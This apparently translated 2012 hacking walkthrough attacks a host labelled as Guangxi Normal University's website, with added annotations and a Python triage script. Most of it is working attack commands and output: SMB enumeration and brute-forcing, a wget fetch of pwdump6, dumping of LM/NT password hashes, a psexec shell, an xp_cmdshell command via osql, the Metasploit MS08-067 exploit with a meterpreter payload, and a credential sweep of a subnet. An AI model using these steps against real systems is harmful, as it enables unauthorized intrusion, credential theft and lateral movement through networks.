Guangxi Normal University website http://202.103.242.241/:
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

// A Windows 2000 host with SMB (139/445), RPC endpoints and Terminal Services exposed. Nmap only prints a MAC address when the scanner sits on the same layer-2 segment, and 08:00:27 is the VirtualBox OUI (registered to Cadmus Computer Systems), so the target is a VM on the scanner's own network.
3 ?( L+ @" P1 Y9 a7 Z6 Q) H' L6 ~* B
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
4 g& v6 s% l1 n$ o8 _6 x" O# o
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

// No credentials were supplied, so the script got this list over a null session (SAMR enumeration, falling back to LSA lookups, over MSRPC). TsInternetUser is the Terminal Services account Windows 2000 creates on its own; test is a locally added account and the obvious first target.
5 j3 }) m8 T: u- U1 c |
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

// Anonymous READ on IPC$ is the null session: an unauthenticated client may open the IPC pipe, which is exactly what smb-enum-users and smb-enum-shares relied on above (the Windows 2000 default of RestrictAnonymous=0). ADMIN$ and C$ are the administrative shares and still require credentials.
' ^* c O! [6 s9 |. v5 f/ z, W# p
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// brute-force the users' passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

// With no userdb/passdb given, smb-brute works from the usernames it enumerated plus nmap's bundled lists under nselib/data, and it tries the blank password and the username-as-password on its own. Two weak credentials fall out: a blank Administrator password and test:123456. Before brute-forcing anything that matters, check the account lockout policy (smb-enum-domains prints it); smb-brute does try to respect it, but a locked-out Administrator is still a self-inflicted outage.
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // fetch pwdump6 to dump the password hashes

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
// smb-pwdump runs the pwdump6 binaries it finds under nselib/data on the target the way smb-psexec does (upload via the admin share, start as a service), so the account it is given needs administrative rights; test evidently has them on this host.

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

// Format is user:RID => LM hash:NT hash. "NO PASSWORD" is pwdump's placeholder for the hash of an empty password, consistent with the blank Administrator login smb-brute found. The trailing half AAD3B435B51404EE in test's LM hash is the LM hash of an empty 7-byte block, so that password is at most 7 characters; its NT hash 32ED87BDB5FDC5E9CBA88547376818D4 is MD4 of "123456" in UTF-16LE.
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command through xp_cmdshell

// The port scan at the top did not show 1433/tcp open and the post gives no output for this command, so treat the osql line as an aside: it only works if SQL Server is actually listening and sa really has that password. When it does, xp_cmdshell runs commands with the SQL Server service account's privileges, which on a box like this is typically SYSTEM.
1 k$ V8 c O0 | ?
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target for known SMB vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

// MS08-067 (CVE-2008-4250) is the Server service path-canonicalization overflow in netapi32, reachable by an unauthenticated client over the SMB named pipe, so it yields SYSTEM without any of the credentials found above. Later nmap releases keep this particular check off unless --script-args=unsafe=1 is given, because probing it can crash the Server service; a "VULNERABLE" verdict is therefore also a sign the host has been untouched by patches since 2008.
root@bt:~# msfconsole    // exploit MS08-067 from Metasploit against the target

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

// bind_tcp makes the target listen and the attacker connect in, which works here because nothing filters inbound traffic to the VM; behind a firewall the usual choice is reverse_tcp with LHOST set to the attacker. The module's automatic targeting picks the return address from the SMB OS and language fingerprint; "show targets" lists the alternatives, and a wrong target crashes the Server service instead of returning a shell, so get it right the first time on anything you cannot reboot.
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames and the captured hash against the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

// Note what actually matched on 192.168.1.105: the blank administrator password, which smb-brute tries on its own, not the value in password.txt (which is only the LM half of test's hash, not a credential by itself). Reusing dumped credentials across a subnet is sound practice, since local account passwords are routinely shared between machines, but put the full LM:NT pair or a cracked cleartext in passdb, not half a hash.
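Once a sweep covers 254 hosts, picking the "Login was successful" and "VULNERABLE" lines out of the scroll-back by eye does not scale. The following is an added example and not part of the original post: a parser for nmap's normal output that collects open ports, enumerated users, smb-brute hits and smb-check-vulns verdicts per host, then ranks the hosts. The sample text is constructed: the first host is assembled from the page's own scan results, and the second host (192.168.1.120, with nothing found) is made up to give the parser a negative case. The names parse_nmap_output and triage are this example's own.

```python
import re

# Constructed sample in nmap's normal-output format. Host 1 is assembled from the page's
# scan results; host 2 is invented so the parser has a host with no findings.
SAMPLE_OUTPUT = """\
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 01:00 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.1.120
Host is up (0.00088s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds

Host script results:
| smb-brute:
|_  No accounts found
| smb-check-vulns:
|_  MS08-067: NOT VULNERABLE

Nmap done: 2 IP addresses (2 hosts up) scanned in 30.10 seconds
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE  = re.compile(r'^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?')
PORT_RE  = re.compile(r'^(\d+)/(tcp|udp)\s+open\s+(\S+)')
USERS_RE = re.compile(r'^\|[_ ].*Users:\s*(.+?)\s*$')
CRED_RE  = re.compile(r'^\|[_ ]\s*(\S+?):(\S+)\s*=>\s*Login was successful')
# "MS08-067: VULNERABLE" matches; "MS08-067: NOT VULNERABLE" does not
VULN_RE  = re.compile(r'^\|[_ ]\s*(MS\d{2}-\d{3}):\s*VULNERABLE\b')


def parse_nmap_output(text):
    """Map each host IP to its open ports, enumerated users, working logins and vulns."""
    hosts, cur = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = hosts.setdefault(m.group(1), {'ports': [], 'users': [], 'creds': [], 'vulns': []})
            continue
        if cur is None:
            continue
        if m := PORT_RE.match(line):
            cur['ports'].append(f'{m.group(1)}/{m.group(2)} {m.group(3)}')
        elif m := USERS_RE.match(line):
            cur['users'].extend(u.strip() for u in m.group(1).split(','))
        elif m := CRED_RE.match(line):
            cur['creds'].append((m.group(1), m.group(2)))
        elif m := VULN_RE.match(line):
            cur['vulns'].append(m.group(1))
    return hosts


def triage(text):
    """Rank hosts: working credentials and confirmed vulns first, then by IP."""
    hosts = parse_nmap_output(text)

    def key(item):
        ip, h = item
        return (-(len(h['creds']) + len(h['vulns'])), tuple(int(o) for o in ip.split('.')))

    return sorted(hosts.items(), key=key)


if __name__ == '__main__':
    for ip, h in triage(SAMPLE_OUTPUT):
        print(ip, 'ports=' + ','.join(h['ports']), 'creds=' + str(h['creds']), 'vulns=' + str(h['vulns']))
```

For a real sweep, feed it the file written with -oN; the regexes key on the script output lines themselves rather than on which script block they sit in, so the same parser works whether the scan ran one SMB script or all of them. Hosts with a working login and an unpatched MS08-067 sort to the top, which is the order you would work them in.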
The attack succeeded: a simple msf + nmap attack.